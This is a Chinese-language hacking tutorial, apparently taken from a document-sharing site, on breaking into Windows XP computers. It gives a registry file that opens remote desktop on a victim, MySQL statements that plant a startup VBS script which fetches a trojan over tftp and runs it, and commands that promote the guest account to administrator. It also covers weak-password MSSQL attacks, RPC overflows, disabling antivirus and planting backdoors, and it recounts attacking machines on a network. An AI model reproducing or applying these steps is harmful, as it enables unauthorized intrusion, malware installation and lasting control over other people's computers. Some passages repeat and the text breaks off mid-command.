《如何入侵XP(xp入侵教程)》由会员分享,可在线阅读,更多相关《如何入侵XP(xp入侵教程)(6页珍藏版)》请在金锄头文库上搜索。
1、最近有好多人都在问如何入侵 XP。而且还都在用入侵2000的老方法对付 XP。这是行不通的。 我做了一个总结,看看可以使你对 XP 有一个清醒的认识,并从中找出一些入侵 XP 的好的方法。 入侵 xp 一向来都是很困难,但并不是不能入侵。 只是 xp 的安全性相对于 windows 其它糸最近有好多人都在问如何入侵 XP。而且还都在用入侵2000的老方法对付 XP。这是行不通的。我做了一个总结,看看可以使你对 XP 有一个清醒的认识,并从中找出一些入侵 XP 的好的方法。入侵 xp 一向来都是很困难,但并不是不能入侵。 只是 xp 的安全性相对于 windows 其它糸列好些罢了,下面是 xp
2、 的一些特点第一:xp 的 ipc$命名管道默认是 guest 用户权限登陆,并且密码不能为空,可以通过 mmc 添加管理单元去修改,充许任何用户权限登陆, 但需桌面交互,和获得管理员权限. (这就是为什么要开3389 的原因)第二:xp 糸统不支持多用户同时登陆 ,同一时间只能充许一个用户连接和登陆,建义使用 system 权限进入 xp 主机( 也就是用溢出 ,溢出成功后都直接进入 system32目录,或种植木马),所以通过各种 方法入侵xp 主机后的第一步并不是添加一个用户名, 而是上传一个木马程序更为实际. 因为在没有开启终端或仿真终端的情况下,就算你拥有一台 xp 主机的用户和密码
3、, 也没什么用。第三:现在来说说 XP 的远程终端连接。xp 自带的远桌面连接(3389终端),安装时默认已经安装和启动,你只要打开电脑属性但要远程连接,还 需要更改一下设置,最简单的方法远程修改注册表( 这种方法好处在于不用桌面交互),当 然你也可以用 slave 等远程桌面管理软件来开启,但是这样容易暴露,你的一举一动都会在桌面有显示.下面给出注册表修改方法:新建一注册表文件,内容为:regedit4 (一定要大写)hkey_local_machinesystemcurrentcontrolsetcontrolterminal servefdenytsconnections=dword:0
4、0000000假如把上面的注册表文件存为3389.reg,把3389.reg 上传到肉机执行 regedit /s 3389.reg,这样就可以远程连接了。第四:如果你想像2000那样映射 XP 的共享硬盘,要通过修改对方的本地安全策略。在 【可匿名访问的工享】中添加上 c$,d$.等。第五:xp 中的仿真终端服务启动后默认为 ntlm 验证,可以用 xp 自带的 tlntadmn(net start 只能在本地启动仿真终端服务)命令开启远程主机的 telnet,而 shutdown 命令可以关闭远程主机,sc 命令也以配置远程服务.,这些是 xp 自带的小工具 .第六:另外 XP 自带的自动
5、更新和防火墙也为 XP 增强了一些安全保护。好了,XP 的一些特点介绍完了。现在总结一些入侵 XP 的具体办法。首先我现总结一下我得入侵体会。第一:由于 XP 不支持管理员权限 IPC$连接,所以不能直接在 DOS 下复制文件。一但进入 XP 的系统目录,首先应该在本地主机建立一个 FTP 服务器,用来方便快捷的上传和下载文件。第二:入侵系统后建立帐户时,不但要把它加入 ADMINISTRATORS 组,还要把它加入GUESTS 组。因为 XP 的许多限制默认都是都是 guest 权限的,把它加入了管理员组,无形之中就使这些连接具有了 admin 权限。切记只是突破 XP 各种限制的突破口。第
6、三:在后门的选择上,可以多考虑一下3389。这可是2000 所没有的。你用工具开他的远程桌面连接,既省掉了木马被杀的风险,而且可以完全控制对方计算机。第四:好好利用 XP 的【本地全策略】 ,其实 XP 的好多限制都来自这里,包括用户和远程访问的限制。你一但同过3389远程登陆到对方主机,首先就要更改它的设置。下面举几个实例:【本地安全策略】【用户权利指派】【从网络访问此计算机】中入guest用户。这样你就能在本地【运行】中输入ip 浏览对方共享目录了。【本地安全策略】【用户权利指派】【拒绝从网络访问此计算机】中删除guest用户。还有很多方法可以为自己提高权限,通过注册表等等。就看你如何利用
7、了。这里就不多说了接着介绍一些入侵 XP 的方法:当然溢出还是绝对的主角,他的好处是可以得到cmdshell 。缺点就是成功率不太高,要有耐心。对没打补丁的 XPsp1来说 MS04011,MS03049漏洞还是很多的(ms05039主要这对的是2000)。直接溢出,不用在本地开端口,溢出成功后用 telnet 直接登陆就行了。还有就是扫描135端口,看有没有 rpc 溢出,这是比较流行的。工具网上又很多自己去搜吧。最后是利用数据库入侵。经典的是 mysql 和 mssql。前者我没试过所以找了些资料大家看看吧:mysql 入侵工具:wineggdropshell v1.351用 mysql
8、连接你拥有用户名和密码的远程 mysql 数库.2新建一个数据表后 ,安格式把下面两行语句写到新建的数据表中假如你新建的数据表为 aa,(1)insert into aa values (set wshshell=createobject (wscript.shell);(2)insert into aa values (a=wshshell.run (cmd.exe /c (tftp -i 127.0.0.1 get win135.exe c:windowssystem32win135.exe & c:windowssystem32win135.exe -install) & (net st
9、art win135),0);3把新建的数据表为脚本文件并导出到启动项:select * from aa into outfile c:docume1alluse1 开始菜单程序启动aa.vbs;4保存成功后,只要对方重启你就可以用木马登陆了mssql,呵呵不多说了相信大家都听说过了:首先扫描1433端口开放的主机,然后用 x-scan 中扫描 mssql 弱口令 。 再用 sqlexec 连接带有弱口令的主机 ,接着用 tftp 上传木马 ,用木马的 system 权限登陆后,再上传3389.reg 开他的远程终端。用3389登陆后.别忘了册掉新建的用户,因为 xp 登陆对话框中会把新建的用
10、户显示出来 .除非你是用的内置帐户,或克隆的内置账户。这就是我入侵 XP 的一些经验。希望可以为大家提供一些参考。更新:不要指望在 XP 上开3389了,虽然可以通过注册表开启远程桌面连接。但是 XP 只允许一个用户在同一时间登陆。没办法更改。网上传说的修改注册表的方法:HKEY LOCALMACHINESystemCurrentControlSetControlTerminal ServerLicensing Core 分支,新建一个名为“EnableConcurrentSessions”的 DWORD 值,将键值设置为“ 1”,就可以让 Windows XP 支持两个用户。只针对 XP 测
11、试版,该版本目前已经快绝迹了。除非把测试版的3389文件替换掉 XP SP2的文件才能成功。1.思路:突破 xp 系统远程访问的限制,实现文件传输和远程登陆。 2.工具:rpc 漏洞扫描工具、溢出工具,pstools 工具包。 3.步骤 1)步骤一:rpc 漏洞扫描: 推荐使用 retinarpcdcom.exe(eeye 公司推出的专门针对 RPC 漏洞的1.思路:突破 xp 系统远程访问的限制,实现文件传输和远程登陆。2.工具: rpc 漏洞扫描工具、溢出工具,pstools 工具包。3.步骤1)步骤一:rpc 漏洞扫描:推荐使用 retinarpcdcom.exe( eeye 公司推出的
12、专门针对 RPC 漏洞的扫描工具)图形界面,在剑鹰网络安全小组有下载。2)步骤二: 远程溢出:在剑鹰网络安全小组有很多该类工具下载,我用 xp.exe,溢出成功率极高。3)步骤三: 提升 guest 权限(本方案之关键):命令:net user guest /active:yesnet localgroup aministrators guest /add看到这里,也许你会嗤之以鼻,可这正是大家忽略的地方,因为 guest 有与其它所有帐号不同的特性。如果你用 net user guest 命令,将会看到下面的内容:Password required No这正是突破 xp 系统远程访问帐号限制
13、的突破口!除了 guest 外,其它帐号都是Password required yes所以就算你有 xp 系统的管理员帐号密码一样无所作为。当 guest 提升为 admin 权限后,你试试dir IPc$呵呵,现在你已经有了读写权限,连 ipc$连接都省了当然你也一样可以用 net use ip /user:guest来进行 IPC$连接(不过是多此一举) 。到此,文件传输的问题已经解决!4)步骤四: 远程登陆我们当然不想每次用溢出登陆对方。那么就试试 opentelnet 吧opentelnet ip guest 1 90read ntlm failed shit!用 administra
14、tor 也是这样子。上传 srv.exe 试试,我没试过,有兴趣的自己试试。因为我认为用 psexec 方便多了。命令如下:psexec ip cmd (连 ipc$不用开了,爽吧)5)关于后门:各显神通,我正好用来试试榕哥的 bits.dll,感觉一点都不好,榕哥的 fans 可别拿鸡蛋扔我哦 6)注意事项:千万别在 xp 系统中建新帐户(为什么?自己想想)xp 系统默认只能登陆一个帐户,故用3389的远程登陆是不行的。rpc 溢出会导致对方重启,要慎用,尤其是服务器。由于当时只是粗略的看了看,自己没去试验文章里的方法,今天有时间了就测试一下。我在内网的,所以就在内网里测试吧,首先用 sup
15、erscan 扫了一个网段。10.200.6.110.200.6.254,看看那些机子开放了 5000端口。一般情况下这样的机子都是 XP 系统。好了,速度很快,出来一大片。然后我用 RPC 的溢出工具,打开,填入一个机子的 IP 地址,失败,可能人家已经打了补丁没关系,我们继续来,终于有一个成功了Microsoft Windows XP 版本 5.1.2600(C) 版权所有 1985-2001 Microsoft Corp.C:WINDOWSsystem32为了保险一点,我先个机子安装一个后门再说,传个文件过去,这个方法很多。TFTP,FTP ,在命令行用脚本或者 http 下载都可以实现。这个需要考虑对方有没有开杀毒软件,如果有的话先传个 pulist.exe 以及 pslist.exe 过去先把杀毒软件的服务停止,然后杀掉进程,这时再传木马过去。好了,我们先看看对方的用户信息C:WINDOWSsystem32net usernet user 的用户帐户-Administrator Guest HelpAssistantSUPPORT_388945a0命令运行完毕,但发生一个或多个错误。然后我们把 guest 激活并加入管理员组。C:WINDOW
